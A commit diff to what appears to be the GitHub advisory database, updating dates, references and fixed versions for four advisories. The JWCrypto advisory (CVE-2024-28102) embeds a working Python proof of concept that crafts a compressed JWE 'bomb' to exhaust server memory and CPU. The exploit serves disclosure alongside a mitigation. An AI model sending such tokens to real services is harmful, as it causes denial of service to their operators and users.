Publish Advisories

GHSA-q2xp-75m7-gv52
GHSA-j857-7rvv-vj97
GHSA-48p4-8xcf-vxj5
GHSA-8j8w-wwqc-x596

Author: advisory-database[bot]

advisories/github-reviewed/2019/04/GHSA-q2xp-75m7-gv52/GHSA-q2xp-75m7-gv52.json

@@ -1,7 +1,7 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-q2xp-75m7-gv52",
-  "modified": "2023-09-25T11:41:56Z",
+  "modified": "2025-12-22T18:41:59Z",
   "published": "2019-04-02T15:36:49Z",
   "aliases": [
     "CVE-2019-10648"
@@ -47,10 +47,6 @@
       "type": "WEB",
       "url": "https://github.com/robo-code/robocode/commit/836c84635e982e74f2f2771b2c8640c3a34221bd#diff-0296a8f9d4a509789f4dc4f052d9c36f"
     },
-    {
-      "type": "ADVISORY",
-      "url": "https://github.com/advisories/GHSA-q2xp-75m7-gv52"
-    },
     {
       "type": "WEB",
       "url": "https://sourceforge.net/p/robocode/bugs/406"

advisories/github-reviewed/2024/03/GHSA-j857-7rvv-vj97/GHSA-j857-7rvv-vj97.json

@@ -1,13 +1,13 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-j857-7rvv-vj97",
-  "modified": "2024-03-21T18:29:26Z",
+  "modified": "2025-12-22T18:42:18Z",
   "published": "2024-03-06T20:00:56Z",
   "aliases": [
     "CVE-2024-28102"
   ],
   "summary": "JWCrypto vulnerable to JWT bomb Attack in `deserialize` function",
-  "details": "## Affected version\nVendor: https://github.com/latchset/jwcrypto\nVersion: 1.5.5\n\n## Description\nAn attacker can cause a DoS attack by passing in a malicious JWE Token with a high compression ratio.\nWhen the server processes this Token, it will consume a lot of memory and processing time.\n\n## Poc\n```python\nfrom jwcrypto import jwk, jwe\nfrom jwcrypto.common import json_encode, json_decode\nimport time\npublic_key = jwk.JWK()\nprivate_key = jwk.JWK.generate(kty='RSA', size=2048)\npublic_key.import_key(**json_decode(private_key.export_public()))\n\n\npayload = '{\"u\": \"' + \"u\" * 400000000 + '\", \"uu\":\"' + \"u\" * 400000000 + '\"}'\nprotected_header = {\n    \"alg\": \"RSA-OAEP-256\",\n    \"enc\": \"A256CBC-HS512\",\n    \"typ\": \"JWE\",\n    \"zip\": \"DEF\",\n    \"kid\": public_key.thumbprint(),\n}\njwetoken = jwe.JWE(payload.encode('utf-8'),\n                   recipient=public_key,\n                   protected=protected_header)\nenc = jwetoken.serialize(compact=True)\n\nprint(\"-----uncompress-----\")\n\nprint(len(enc))\n\nbegin = time.time()\n\njwetoken = jwe.JWE()\njwetoken.deserialize(enc, key=private_key)\n\nprint(time.time() - begin)\n\nprint(\"-----compress-----\")\n\npayload = '{\"u\": \"' + \"u\" * 400000 + '\", \"uu\":\"' + \"u\" * 400000 + '\"}'\nprotected_header = {\n    \"alg\": \"RSA-OAEP-256\",\n    \"enc\": \"A256CBC-HS512\",\n    \"typ\": \"JWE\",\n    \"kid\": public_key.thumbprint(),\n}\njwetoken = jwe.JWE(payload.encode('utf-8'),\n                   recipient=public_key,\n                   protected=protected_header)\nenc = jwetoken.serialize(compact=True)\n\nprint(len(enc))\n\nbegin = time.time()\n\njwetoken = jwe.JWE()\njwetoken.deserialize(enc, key=private_key)\n\nprint(time.time() - begin)\n```\nIt can be found that when processing Tokens with similar lengths, the processing time of compressed tokens is significantly longer.\n<img width=\"172\" alt=\"image\" src=\"https://github.com/latchset/jwcrypto/assets/133195620/23193327-3cd7-499a-b5aa-28c56af92785\">\n\n\n\n## Mitigation\nTo mitigate this vulnerability, it is recommended to limit the maximum token length to 250K. This approach has also\nbeen adopted by the JWT library System.IdentityModel.Tokens.Jwt used in Microsoft Azure [1], effectively preventing\nattackers from exploiting this vulnerability with high compression ratio tokens.\n\n## References\n[1] [CVE-2024-21319](https://github.com/AzureAD/azure-activedirectory-identitymodel-extensions-for-dotnet/security/advisories/GHSA-8g9c-28fc-mcx2)\n",
+  "details": "## Affected version\nVendor: https://github.com/latchset/jwcrypto\nVersion: 1.5.5\n\n## Description\nAn attacker can cause a DoS attack by passing in a malicious JWE Token with a high compression ratio.\nWhen the server processes this Token, it will consume a lot of memory and processing time.\n\n## Poc\n```python\nfrom jwcrypto import jwk, jwe\nfrom jwcrypto.common import json_encode, json_decode\nimport time\npublic_key = jwk.JWK()\nprivate_key = jwk.JWK.generate(kty='RSA', size=2048)\npublic_key.import_key(**json_decode(private_key.export_public()))\n\n\npayload = '{\"u\": \"' + \"u\" * 400000000 + '\", \"uu\":\"' + \"u\" * 400000000 + '\"}'\nprotected_header = {\n    \"alg\": \"RSA-OAEP-256\",\n    \"enc\": \"A256CBC-HS512\",\n    \"typ\": \"JWE\",\n    \"zip\": \"DEF\",\n    \"kid\": public_key.thumbprint(),\n}\njwetoken = jwe.JWE(payload.encode('utf-8'),\n                   recipient=public_key,\n                   protected=protected_header)\nenc = jwetoken.serialize(compact=True)\n\nprint(\"-----uncompress-----\")\n\nprint(len(enc))\n\nbegin = time.time()\n\njwetoken = jwe.JWE()\njwetoken.deserialize(enc, key=private_key)\n\nprint(time.time() - begin)\n\nprint(\"-----compress-----\")\n\npayload = '{\"u\": \"' + \"u\" * 400000 + '\", \"uu\":\"' + \"u\" * 400000 + '\"}'\nprotected_header = {\n    \"alg\": \"RSA-OAEP-256\",\n    \"enc\": \"A256CBC-HS512\",\n    \"typ\": \"JWE\",\n    \"kid\": public_key.thumbprint(),\n}\njwetoken = jwe.JWE(payload.encode('utf-8'),\n                   recipient=public_key,\n                   protected=protected_header)\nenc = jwetoken.serialize(compact=True)\n\nprint(len(enc))\n\nbegin = time.time()\n\njwetoken = jwe.JWE()\njwetoken.deserialize(enc, key=private_key)\n\nprint(time.time() - begin)\n```\nIt can be found that when processing Tokens with similar lengths, the processing time of compressed tokens is significantly longer.\n<img width=\"172\" alt=\"image\" src=\"https://github.com/latchset/jwcrypto/assets/133195620/23193327-3cd7-499a-b5aa-28c56af92785\">\n\n\n\n## Mitigation\nTo mitigate this vulnerability, it is recommended to limit the maximum token length to 250K. This approach has also\nbeen adopted by the JWT library System.IdentityModel.Tokens.Jwt used in Microsoft Azure [1], effectively preventing\nattackers from exploiting this vulnerability with high compression ratio tokens.\n\n## References\n[1] [CVE-2024-21319](https://github.com/AzureAD/azure-activedirectory-identitymodel-extensions-for-dotnet/security/advisories/GHSA-8g9c-28fc-mcx2)",
   "severity": [
     {
       "type": "CVSS_V3",
@@ -54,6 +54,14 @@
     {
       "type": "PACKAGE",
       "url": "https://github.com/latchset/jwcrypto"
+    },
+    {
+      "type": "WEB",
+      "url": "https://lists.debian.org/debian-lts-announce/2024/09/msg00026.html"
+    },
+    {
+      "type": "WEB",
+      "url": "https://www.vicarius.io/vsociety/posts/denial-of-service-vulnerability-discovered-in-jwcrypto-cve-2024-28102-28103"
     }
   ],
   "database_specific": {

advisories/github-reviewed/2025/06/GHSA-48p4-8xcf-vxj5/GHSA-48p4-8xcf-vxj5.json

@@ -1,7 +1,7 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-48p4-8xcf-vxj5",
-  "modified": "2025-06-30T19:02:21Z",
+  "modified": "2025-12-22T18:43:35Z",
   "published": "2025-06-18T17:50:11Z",
   "aliases": [
     "CVE-2025-50182"
@@ -51,6 +51,10 @@
     {
       "type": "PACKAGE",
       "url": "https://github.com/urllib3/urllib3"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/urllib3/urllib3/releases/tag/2.5.0"
     }
   ],
   "database_specific": {

advisories/github-reviewed/2025/06/GHSA-8j8w-wwqc-x596/GHSA-8j8w-wwqc-x596.json

@@ -1,7 +1,7 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-8j8w-wwqc-x596",
-  "modified": "2025-06-13T20:45:43Z",
+  "modified": "2025-12-22T18:41:25Z",
   "published": "2025-06-02T06:30:32Z",
   "aliases": [
     "CVE-2025-49113"
@@ -26,13 +26,13 @@
           "events": [
             {
               "introduced": "0"
+            },
+            {
+              "fixed": "1.5.10"
             }
           ]
         }
-      ],
-      "database_specific": {
-        "last_known_affected_version_range": "< 1.5.10"
-      }
+      ]
     },
     {
       "package": {
@@ -45,13 +45,13 @@
           "events": [
             {
               "introduced": "1.6.0"
+            },
+            {
+              "fixed": "1.6.11"
             }
           ]
         }
-      ],
-      "database_specific": {
-        "last_known_affected_version_range": "< 1.6.11"
-      }
+      ]
     }
   ],
   "references": [